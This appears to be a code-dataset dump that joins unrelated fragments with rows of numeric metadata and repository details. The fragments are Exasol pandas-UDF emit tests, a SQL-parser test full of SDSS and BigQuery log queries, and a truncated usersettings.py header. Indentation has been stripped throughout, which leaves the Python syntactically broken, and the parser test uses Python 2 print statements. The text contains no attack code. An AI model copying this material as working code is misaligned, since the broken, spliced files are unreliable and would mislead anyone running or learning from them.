udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows="all")
df = df.iloc[:, 1:]
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'emit\(\) takes exactly 11 arguments \(10 given\)'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_numrows_not_all(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows="some")
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'get_dataframe\(\) parameter'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_numrows_not_int(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows=True)
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'get_dataframe\(\) parameter'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_numrows_zero(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows=0)
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'get_dataframe\(\) parameter'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_numrows_negative(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows=-1)
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, "get_dataframe\(\) parameter"):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_scalar_emits_null(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe()
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST2' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple_1, self.col_tuple_2, self.col_tuple_null], rows)
def test_dataframe_set_emits_null(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows='all')
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST2' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple_1, self.col_tuple_2, self.col_tuple_null], rows)
def test_dataframe_scalar_emits_start_col(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(start_col=2)
ctx.emit(df)
/
''' % (self.col_defs_str, ','.join('%s %s'%t for t in self.col_defs[2:])))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST2' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple_1[2:], self.col_tuple_2[2:], self.col_tuple_null[2:]], rows)
def test_dataframe_set_emits_null_start_col(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows='all', start_col=5)
ctx.emit(df)
/
''' % (self.col_defs_str, ','.join('%s %s'%t for t in self.col_defs[5:])))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST2' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple_1[5:], self.col_tuple_2[5:], self.col_tuple_null[5:]], rows)
def test_dataframe_set_emits_null_start_col_negative(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows='all', start_col=-1)
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, "must be an integer >= 0"):
select_sql = 'SELECT foo(%s) FROM FN2.TEST2' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_null_start_col_too_large(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows='all', start_col=100000)
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, "is 100000, but there are only %d input columns" % len(self.col_names)):
select_sql = 'SELECT foo(%s) FROM FN2.TEST2' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_timestamp_truncate_nanoseconds_only(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts timestamp) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.object_)
c1[:]=datetime.datetime(2020, 7, 27, 14, 22, 33, 673251)
#c1[:]=datetime.datetime(2020, 7, 27, 14, 22, 33, 673000, tzinfo=datetime.timezone(datetime.timedelta(0, 3600)))
#c1[:]=datetime.datetime(2020, 7, 27, 14, 22, 33, tzinfo=datetime.timezone(datetime.timedelta(0, 3600)))
#c1[:]=datetime.datetime(1970, 1, 1, 0, 20, 35)
#c1[:]="2020-07-27 14:22:33.600699"
df=pd.DataFrame({0:c1})
df[0]=pd.to_datetime(df[0])
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual(
[
(datetime.datetime(2020, 7, 27, 14, 22, 33, 673000),),
(datetime.datetime(2020, 7, 27, 14, 22, 33, 673000),)
], rows)
def test_dataframe_set_emits_timestamp_milliseconds_only(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts timestamp) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.object_)
c1[:]=datetime.datetime(2020, 7, 27, 14, 22, 33, 673000)
df=pd.DataFrame({0:c1})
df[0]=pd.to_datetime(df[0])
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual(
[
(datetime.datetime(2020, 7, 27, 14, 22, 33, 673000),),
(datetime.datetime(2020, 7, 27, 14, 22, 33, 673000),)
], rows)
def test_dataframe_set_emits_timestamp_with_timezone_only_fail(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts timestamp) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.object_)
c1[:]=datetime.datetime(2020, 7, 27, 14, 22, 33, 673000, tzinfo=datetime.timezone(datetime.timedelta(0, 3600)))
df=pd.DataFrame({0:c1})
df[0]=pd.to_datetime(df[0])
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
with self.assertRaisesRegexp(Exception, "F-UDF-CL-SL-PYTHON-1138"):
rows = self.query(select_sql)
def test_dataframe_set_emits_pystring_only(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts VARCHAR(20000)) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.object_)
c1[:]='abcdefgh '
df=pd.DataFrame({0:c1})
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual(
[
('abcdefgh ',),
('abcdefgh ',)
], rows)
def test_dataframe_set_emits_pyint_only(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts int) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.object_)
c1[:]=234
df=pd.DataFrame({0:c1})
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual(
[
(234,),
(234,)
], rows)
def test_dataframe_set_emits_double_pyfloat_only_todo(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts double) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.object_)
c1[:]=234.5
df=pd.DataFrame({0:c1})
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
#TODO implement support
with self.assertRaisesRegexp(Exception, 'F-UDF-CL-SL-PYTHON-1056'):
rows = self.query(select_sql)
def test_dataframe_set_emits_double_npfloat32_only(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts double) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.float64)
c1[:]=234.5
df=pd.DataFrame({0:c1})
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual(
[
(234.5,),
(234.5,)
], rows)
def test_dataframe_set_emits_timestamp_milliseconds_only_large_emit(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts timestamp) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
for i in range(1000):
c1=np.empty(shape=(1000),dtype=np.object_)
c1[:]=datetime.datetime(2020, 7, 27, 14, 22, 33, 673000)
df=pd.DataFrame({0:c1})
df[0]=pd.to_datetime(df[0])
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
rows = self.query(select_sql)
if __name__ == '__main__':
udf.main()
# vim: ts=4:sts=4:sw=4:et:fdm=indent
| 34.947791
| 192
| 0.522495
| 4,205
| 34,808
| 4.112961
| 0.062069
| 0.052616
| 0.036253
| 0.039665
| 0.892628
| 0.874241
| 0.852905
| 0.848916
| 0.83394
| 0.813819
| 0
| 0.041944
| 0.365749
| 34,808
| 995
| 193
| 34.982915
| 0.74145
| 0.002298
| 0
| 0.731792
| 0
| 0.006936
| 0.453346
| 0.058029
| 0
| 0
| 0
| 0.001005
| 0.043931
| 1
| 0.050867
| false
| 0
| 0.062428
| 0
| 0.116763
| 0.092486
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d57b5f5f39fd42d12b117ea204de6172decd6272
| 15,203
|
py
|
Python
|
src/engine/test_qlogs.py
|
Anniversor/databass-public
|
e69e5ff4b2d1bfb630ac81703eea7c2d24f29218
|
[
"MIT"
] | 1
|
2018-12-23T00:14:46.000Z
|
2018-12-23T00:14:46.000Z
|
src/engine/test_qlogs.py
|
wesleytao/databass-public
|
21df8859a00daf6b199f79623ffc184cba2918a1
|
[
"MIT"
] | null | null | null |
src/engine/test_qlogs.py
|
wesleytao/databass-public
|
21df8859a00daf6b199f79623ffc184cba2918a1
|
[
"MIT"
] | null | null | null |
import unittest
#import StringIO
#import pandas
import tempfile
import os.path
import interpretor
import optimizer
import ops
import db
from interpretor import PullBasedInterpretor
from optimizer import Optimizer
from ops import Limit
from db import Database
from parse_sql import parse
import pandas.util.testing as pdt
db = Database()
opt = Optimizer(db)
interp = PullBasedInterpretor(db)
class TestUnits(unittest.TestCase):
"""Basic unit testing"""
def test_parse_sdss_queries(self):
querytext = """SELECT top 1 p.objID, p.run, p.rerun, p.camcol, p.field, p.obj, p.type, p.ra, p.dec, p.u,p.g,p.r,p.i,p.z, p.Err_u, p.Err_g, p.Err_r,p.Err_i,p.Err_z FROM fGetNearbyObjEq(195,2.5,0.5) n, PhotoPrimary p WHERE n.objID=p.objID
SELECT top 1 p.objID, p.run, p.rerun, p.camcol, p.field, p.obj, p.type, p.ra, p.dec, p.u,p.g,p.r,p.i,p.z, p.Err_u, p.Err_g, p.Err_r,p.Err_i,p.Err_z FROM fGetNearbyObjEq(195,2.5,0.5) n, PhotoPrimary p WHERE n.objID=p.objID
SELECT top 1 p.objID, p.run, p.rerun, p.camcol, p.field, p.obj, p.type, p.ra, p.dec, p.u,p.g,p.r,p.i,p.z, p.Err_u, p.Err_g, p.Err_r,p.Err_i,p.Err_z FROM fGetNearbyObjEq(195,2.5,0.5) n, PhotoPrimary p WHERE n.objID=p.objID
SELECT top 1 p.objID, p.run, p.rerun, p.camcol, p.field, p.obj, p.type, p.ra, p.dec, p.u,p.g,p.r,p.i,p.z, p.Err_u, p.Err_g, p.Err_r,p.Err_i,p.Err_z FROM fGetNearbyObjEq(195,2.5,0.5) n, PhotoPrimary p WHERE n.objID=p.objID
SELECT count(g.objID) FROM Galaxy as g, dbo.fGetNearbyObjEq( 115.866 , 40.5354 , 1.6894005 ) as d WHERE d.objID = g.objID
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469062987925
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007004167733433
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007004168192115
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007004168192128
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063053507
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007004168126653
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469600383058
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063446719
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063184604
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063381160
SELECT count(g.objID) FROM Galaxy as g, dbo.fGetNearbyObjEq( 115.866 , 40.5354 , 1.1262669 ) as d WHERE d.objID = g.objID
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007004168061134
SELECT top 1 p.objID, p.run, p.rerun, p.camcol, p.field, p.obj, p.type, p.ra, p.dec, p.u,p.g,p.r,p.i,p.z, p.Err_u, p.Err_g, p.Err_r,p.Err_i,p.Err_z FROM fGetNearbyObjEq(195,2.5,0.5) n, PhotoPrimary p WHERE n.objID=p.objID
SELECT top 1 p.objID, p.run, p.rerun, p.camcol, p.field, p.obj, p.type, p.ra, p.dec, p.u,p.g,p.r,p.i,p.z, p.Err_u, p.Err_g, p.Err_r,p.Err_i,p.Err_z FROM fGetNearbyObjEq(195,2.5,0.5) n, PhotoPrimary p WHERE n.objID=p.objID
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063249986
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725468526248106
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063184602
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003630796894
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725468526248085
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725468526182582
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003630862447
SELECT count(g.objID) FROM Galaxy as g, dbo.fGetNearbyObjEq( 115.866 , 40.5354 , 0.84470023 ) as d WHERE d.objID = g.objID
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003630862456
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725468526248118
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003631452342
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063774212
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063184628
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007004168192131
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063643301
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063643260
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003631321239
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003631386743
SELECT count(g.objID) FROM Galaxy as g, dbo.fGetNearbyObjEq( 115.866 , 40.5354 , 0.56313347 ) as d WHERE d.objID = g.objID
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003631321255
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003631059105
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003630993526"""
for q in querytext.split("\n"):
try:
plan = parse(q)
except Exception as e:
print q
print
raise e
def test_parse_evan_queries_easy(self):
querytext = """
SELECT DISTINCT(httpRequest.status)
FROM `bluecore-qa.app_engine_logs.appengine_googleapis_com_request_log_20170915`
LIMIT 1000
SELECT protoPayload.startTime, protoPayload.method, protoPayload.resource, protoPayload.nickname
FROM [triggeredmail:app_engine_logs.appengine_googleapis_com_request_log_20170912]
WHERE protoPayload.nickname == 'evan.jones'
ORDER BY protoPayload.startTime
LIMIT 1000
SELECT protoPayload.startTime, protoPayload.method, protoPayload.resource, protoPayload.nickname
FROM [triggeredmail:app_engine_logs.appengine_googleapis_com_request_log_20170912]
WHERE protoPayload.resource LIKE '/api/rest/%/tjmaxx%' AND protoPayload.method != 'GET'
ORDER BY protoPayload.startTime
LIMIT 1000
SELECT protoPayload.startTime, lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_2017082*`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_2017082*`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170828`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170809`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170829`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170829`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%HTTPException%'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170829`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%HTTPException%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170829`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%HTTPException: Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170830`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%HTTPException: Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170830`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%{"table_id":%'
SELECT
requestId,
UNIX_MICROS(timestamp) AS timestamp,
timestamp AS timeHuman,
message
FROM (
SELECT
protoPayload.requestId AS requestId,
lines.time AS timestamp,
lines.logMessage AS message
FROM
`triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170830` AS t,
UNNEST(t.protoPayload.line) AS lines
WHERE
protoPayload.moduleId LIKE '%bigquery%')
WHERE
message LIKE 'Ran out of tries%'
OR message LIKE '====%'
OR message LIKE '{"table_id"%'
ORDER BY
requestId
SELECT protoPayload.startTime, protoPayload.latency, protoPayload.resource, protoPayload.moduleId, protoPayload.instanceId
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170822`
WHERE protoPayload.latency>500 AND protoPayload.resource!="/_ah/background"
ORDER BY protoPayload.latency DESC
LIMIT 1000
SELECT protoPayload.startTime, protoPayload.latency, protoPayload.resource, protoPayload.moduleId
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170822`
WHERE protoPayload.latency>500 AND protoPayload.resource!="/_ah/background"
ORDER BY protoPayload.latency DESC
LIMIT 1000
SELECT protoPayload.startTime, protoPayload.latency, protoPayload.resource
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170822`
WHERE protoPayload.latency>500 AND protoPayload.resource!="/_ah/background"
LIMIT 1000
SELECT protoPayload.startTime, protoPayload.latency, protoPayload.resource
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170822`
WHERE protoPayload.latency>500 AND protoPayload.resource!="/background"
LIMIT 1000
SELECT lines.time, lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_2017081*`, UNNEST(protoPayload.line) as lines
WHERE protoPayload.moduleId = 'integration-track' AND lower(lines.logMessage) LIKE '%overall deadline%'
LIMIT 1000
SELECT protoPayload.resource
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170824`
WHERE protoPayload.resource LIKE '/display_impression/%'
LIMIT 1000
SELECT httpRequest.requestUrl
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170824`
LIMIT 1000
SELECT httpRequest.requestUrl
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170824`
WHERE httpRequest.requestUrl LIKE '/display_impression/%'
LIMIT 1000
SELECT httpRequest.requestUrl
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170825`
WHERE httpRequest.requestUrl LIKE '/display_impression/%'
LIMIT 1000
SELECT httpRequest.requestUrl
FROM `bluecore-qa.app_engine_logs.appengine_googleapis_com_request_log_20170825`
WHERE httpRequest.requestUrl LIKE '/display_impression/%'
LIMIT 1000
SELECT protoPayload.line.time, LENGTH(protoPayload.line.logMessage)
FROM [bluecore-qa:app_engine_logs.appengine_googleapis_com_request_log_20170823]
WHERE protoPayload.resource='/wtf'
ORDER BY protoPayload.line.time DESC
LIMIT 1000
SELECT protoPayload.line.time, LENGTH(protoPayload.line.logMessage)
FROM [bluecore-qa:app_engine_logs.appengine_googleapis_com_request_log_20170823]
WHERE protoPayload.resource='/wtf'
ORDER BY protoPayload.line.time DESC
LIMIT 1000
SELECT protoPayload.line.time, LENGTH(protoPayload.line.logMessage)
FROM [bluecore-qa:app_engine_logs.appengine_googleapis_com_request_log_20170823]
WHERE protoPayload.resource='/wtf'
ORDER BY protoPayload.line.time
LIMIT 1000
SELECT protoPayload.line.time, LENGTH(protoPayload.line.logMessage)
FROM [bluecore-qa:app_engine_logs.appengine_googleapis_com_request_log_20170823]
WHERE protoPayload.resource='/wtf'
LIMIT 1000
SELECT COUNT(*) FROM `triggeredmail.coach.aggregate_purchase_201708`
WHERE order_id IS NULL OR order_id = ''
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
SELECT COUNT(*) FROM `triggeredmail.coach.aggregate_purchase_201708`
WHERE order_id IS NULL OR order_id = ''
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
SELECT COUNT(*) FROM `triggeredmail.coach.aggregate_purchase_201708`
WHERE order_id IS NULL OR order_id = ''
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
SELECT COUNT(*) FROM `triggeredmail.coach.aggregate_purchase_201708`
WHERE order_id IS NULL OR order_id = ''
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
SELECT COUNT(*) FROM `triggeredmail.coach.aggregate_purchase_201708`
WHERE order_id IS NULL OR order_id = ''
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
"""
queries = [""]
for l in querytext.split("\n"):
if l.strip() == "":
queries.append("")
continue
queries[-1] += " " + l.strip()
queries = filter(bool, queries)
outputs = []
for q in queries:
try:
plan = parse(q)
except Exception as e:
print q
print
raise e
if __name__ == '__main__':
unittest.main()
"""
import click
from parse_expr import parse as parse_expr
from parse_sql import parse as parse_sql
if __name__ == "__main__":
import click
@click.command()
@click.option("-e", type=str)
@click.option("-q", type=str)
def run(e=None, q=None):
if e:
print(e)
ast = parse_expr(e)
print(ast)
if q:
print(q)
ast = parse_sql(q)
print(ast)
run()
"""
| 40.113456
| 256
| 0.792015
| 2,173
| 15,203
| 5.361712
| 0.105384
| 0.059823
| 0.029268
| 0.039911
| 0.834692
| 0.830744
| 0.830229
| 0.82199
| 0.82199
| 0.804995
| 0
| 0.08744
| 0.119121
| 15,203
| 378
| 257
| 40.219577
| 0.782557
| 0.001842
| 0
| 0.594697
| 0
| 0.049242
| 0.927438
| 0.42364
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.049242
| null | null | 0.015152
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d5999d9c3cf2386cddbc851cf0ac0cbdd2131ad2
| 50,158
|
py
|
Python
|
src/modules/nulsws_python/user_settings/usersettings.py
|
nmschorr/mybackup
|
52d2d11b7da65b9802e74cb915ed2e8ae4f18d5c
|
[
"MIT"
] | 1
|
2019-12-13T09:17:56.000Z
|
2019-12-13T09:17:56.000Z
|
src/modules/nulsws_python/user_settings/usersettings.py
|
nmschorr/mybackup
|
52d2d11b7da65b9802e74cb915ed2e8ae4f18d5c
|
[
"MIT"
] | null | null | null |
src/modules/nulsws_python/user_settings/usersettings.py
|
nmschorr/mybackup
|
52d2d11b7da65b9802e74cb915ed2e8ae4f18d5c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.7
"""
by Nancy Schorr for Nuls, None),
(December, None),
(2019
"""
